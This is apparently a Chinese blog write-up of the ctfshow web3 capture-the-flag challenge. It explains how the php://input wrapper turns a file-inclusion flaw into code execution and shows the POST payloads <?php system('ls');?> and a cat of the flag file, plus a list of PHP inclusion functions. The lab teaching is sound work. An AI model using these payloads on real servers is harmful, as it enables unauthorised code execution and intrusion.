ctfshow-web3(伪协议php://input的利用)

本文围绕PHP伪协议在文件包含漏洞中的利用展开。介绍了常用的php://input伪协议,可在特定请求条件下将post数据当作php代码执行。通过实例展示利用该协议执行代码、写入文件,还提及多种文件包含函数,强调存在文件包含时可利用PHP伪协议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开题目链接,存在文件包含函数 include 

存在文件包含时直接使用PHP伪协议 

先介绍一下一个常用的php伪协议:

php://input(用于执行PHP代码)

这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。

php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,当传入的参数作为文件名打开时,可以将参数设为php://input,同时post写入想要执行的php代码,php执行时会将post内容当作文件内容,从而导致任意代码执行

例如:
http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>

利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码

这里我先使用的hackbar:

?url=php://input

post:<?php system("ls");?>

但是不知道为什么没有回显

查看源码也是什么也没有

尝试使用burpsuite抓包改包重发

传入的post数据要空一行,否则不会有回显

发现php代码被执行了

直接查看 ctf_go_go_go

?url=php://input

post:<?php system("cat ctf_go_go_go");?>

拿到flag

ctfshow{dd40f825-6cd2-49fc-8148-03ef4563e0da} 

此外,再告诉大家一些可能遇到的文件包含函数:
include

require

include_once

require_once

highlight_file

show_source

flie

readfile

file_get_contents

file_put_contents

fopen


存在文件包含时就应该想到php伪协议的利用

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值